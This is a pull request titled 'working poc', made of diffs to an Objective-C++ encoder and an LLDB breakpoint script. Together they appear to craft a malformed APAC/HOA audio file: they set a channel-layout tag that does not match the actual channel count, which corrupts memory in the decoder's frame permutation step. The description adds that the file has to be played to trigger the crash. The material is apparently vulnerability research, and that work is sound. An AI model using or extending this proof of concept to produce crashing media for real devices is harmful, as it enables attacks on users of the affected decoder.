### PR TITLE
working poc

### DIFF
--- a/encodeme.mm
+++ b/encodeme.mm
@@ -13,7 +13,8 @@ struct CodecConfig {
 void OverrideApac(CodecConfig* config) {
   //The mRemappingArray is sized based on the lower two bytes of mChannelLayoutTag.
   //By creating a mismatch between them, a later stage of processing in APACHOADecoder::DecodeAPACFrame is corrupted.
-  //When the APACHOADecoder goes to process the APAC frame, for some reason it uses a permutation map that is the size given here in 
+  //When the APACHOADecoder goes to process the APAC frame (permute it according to the channel remapping array), 
+  //for some reason it uses a permutation map that is the size given here in 
   //mChannelLayoutTag, rather than just based on m_totalComponents. 
   config->remappingChannelLayout->mChannelLayoutTag = kAudioChannelLayoutTag_HOA_ACN_SN3D | 0x8;
   

--- a/encodeme.mm
+++ b/encodeme.mm
@@ -24,7 +24,7 @@ void OverrideApac(CodecConfig* config) {
 }
 
 int main() {
-  //This is the number of channels
+  //This is the actual number of channels
   uint32_t channelNum = 1;
   AVAudioFormat* formatIn = [[AVAudioFormat alloc] initStandardFormatWithSampleRate:44100
                                                                            channels:channelNum];

--- a/run_encodeme_hook.lldb
+++ b/run_encodeme_hook.lldb
@@ -1,6 +1,6 @@
 b apac::hoa::CodecConfig::Serialize
 breakpoint command add
-print PatchCodecConfig((CodecConfig*)$x0)
+print OverrideApac((CodecConfig*)$x0)
 DONE
 breakpoint modify --auto-continue true
 run

--- a/run_encodeme_hook.lldb
+++ b/run_encodeme_hook.lldb
@@ -1,20 +1,6 @@
 b apac::hoa::CodecConfig::Serialize
 breakpoint command add
-bt
-print OverrideApac((CodecConfig*)$x0)
+print PatchCodecConfig((CodecConfig*)$x0)
 DONE
-breakpoint modify --auto-continue true --disable --one-shot true --ignore-count 1 1
-b ExtAudioFileDispose
-breakpoint command add
-breakpoint enable 1
-breakpoint enable 3
-DONE
-breakpoint modify --auto-continue true --one-shot true 2
-b AudioFormatGetProperty
-breakpoint command add
-bt
-print $x1=0
-print $x2=0
-DONE
-breakpoint modify --auto-continue true --condition "$x0 == 'fmti'" --disable --one-shot true 3
+breakpoint modify --auto-continue true
 run


### PR DESCRIPTION
You were really close. My comment has the basic idea of the bug though. Make sure that whatever tool you use to invoke the library actually also tries to *play* the audio, because the crash actually happens when trying to decode a frame, even though the bug is during the decoding of the cookie.